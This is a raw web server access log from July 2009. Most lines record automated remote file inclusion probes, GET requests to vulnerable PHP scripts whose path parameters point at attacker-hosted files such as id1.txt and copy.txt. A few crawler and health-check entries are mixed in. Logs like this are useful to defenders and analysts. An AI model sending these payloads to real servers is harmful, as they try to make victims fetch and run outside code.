206.225.23.4 - - [20/Jul/2009:01:12:58 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:03 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:10 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:10 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:10 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:11 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:11 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:11 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:14 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:13:15 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.55.105.235 - - [20/Jul/2009:01:14:19 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.235 - - [20/Jul/2009:01:14:19 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.230.156.161 - - [20/Jul/2009:01:14:24 -0400] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://haxor-vendetta.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.230.156.161 - - [20/Jul/2009:01:14:24 -0400] "GET /logs/access_log.Q109070900//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://haxor-vendetta.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.230.156.161 - - [20/Jul/2009:01:14:24 -0400] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://haxor-vendetta.com/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:01:15:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [20/Jul/2009:01:15:31 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:35 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:35 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:35 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:36 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:36 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:36 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:40 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:41 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:43 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:43 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:43 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:15:48 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:15:50 -0400] "GET /logs/access_log.Q109052200//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:15:50 -0400] "GET //coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:15:50 -0400] "GET /logs//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:15:52 -0400] "GET /logs/access_log.Q109051400//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:02 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:02 -0400] "GET /logs/access_log.Q109062100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:02 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:16:07 -0400] "GET //coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:16:07 -0400] "GET /logs//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:16:07 -0400] "GET /logs/access_log.Q109051400//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:16:07 -0400] "GET /logs/access_log.Q109052200//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:08 -0400] "GET /logs/access_log.Q109062100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:15 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:16:15 -0400] "GET /logs/access_log.Q109062100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:01:16:24 -0400] "GET /logs/access_log.Q109070900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.19.3.66 - - [20/Jul/2009:01:16:52 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.19.3.66 - - [20/Jul/2009:01:17:14 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:18:11 -0400] "GET /logs/access_log.Q109052200%20%20//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:18:11 -0400] "GET /logs/access_log.Q109051400%20%20//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:18:41 -0400] "GET /logs/access_log.Q109052200%20%20//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:01:18:41 -0400] "GET /logs/access_log.Q109051400%20%20//coppercop/theme.php?THEME_DIR=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:35 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:35 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:35 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:39 -0400] "GET /logs/access_log.Q109051700//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:19:59 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:20:05 -0400] "GET /logs/access_log.Q109051700//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:01:20:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [20/Jul/2009:01:20:06 -0400] "GET /logs/access_log.Q109051700//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:00 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:00 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:00 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:00 -0400] "GET /logs/access_log.Q109051700//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:41 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:21:41 -0400] "GET /logs/access_log.Q109051700%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:01:22:45 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
218.145.31.242 - - [20/Jul/2009:01:22:46 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
218.145.31.242 - - [20/Jul/2009:01:22:46 -0400] "GET //skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
218.145.31.242 - - [20/Jul/2009:01:22:47 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.145.31.242 - - [20/Jul/2009:01:22:47 -0400] "GET //skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.145.31.242 - - [20/Jul/2009:01:22:47 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
206.225.23.4 - - [20/Jul/2009:01:23:00 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:23:00 -0400] "GET /logs/access_log.Q109051700%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:01:23:34 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
216.93.186.188 - - [20/Jul/2009:01:23:35 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=eng&page=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:01:23:35 -0400] "GET /logs/access_log.Q109070400//trans/trans.php?trans=eng&page=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:01:23:35 -0400] "GET /logs//trans/trans.php?trans=eng&page=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:01:23:35 -0400] "GET //trans/trans.php?trans=eng&page=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:23:37 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:23:37 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:23:37 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:01:24:02 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/login.php?dir=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
206.225.23.4 - - [20/Jul/2009:01:24:02 -0400] "GET /logs/access_log.Q109071500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:24:09 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:24:12 -0400] "GET /logs/access_log.Q109071500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.122.158.207 - - [20/Jul/2009:01:24:13 -0400] "GET /logs///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:13 -0400] "GET /logs/access_log.Q109070800///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:13 -0400] "GET ///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:15 -0400] "GET /logs/error_log.Q109070800///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
206.225.23.4 - - [20/Jul/2009:01:24:20 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:24:20 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:24:27 -0400] "GET /logs/access_log.Q109053000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:24:29 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.122.158.207 - - [20/Jul/2009:01:24:32 -0400] "GET /logs/access_log.Q109070800///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:32 -0400] "GET ///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:33 -0400] "GET /logs///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
116.122.158.207 - - [20/Jul/2009:01:24:34 -0400] "GET /logs/error_log.Q109070800///write.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:49 -0400] "GET /logs/access_log.Q109071500%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:51 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:51 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:24:51 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
72.30.78.231 - - [20/Jul/2009:01:25:01 -0400] "GET /logs/access_log.Q107112900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/Jul/2009:01:25:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [20/Jul/2009:01:25:08 -0400] "GET //?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:25:08 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [20/Jul/2009:01:25:08 -0400] "GET /logs//?_zb_path=http://giffarine.co.th/libraries/tcpdf/copy.txt??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:25:32 -0400] "GET /logs/access_log.Q109070800%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:01:25:37 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:25:55 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:25:56 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:25:58 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:26:06 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:01:26:06 -0400] "GET /logs/access_log.Q109071500%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
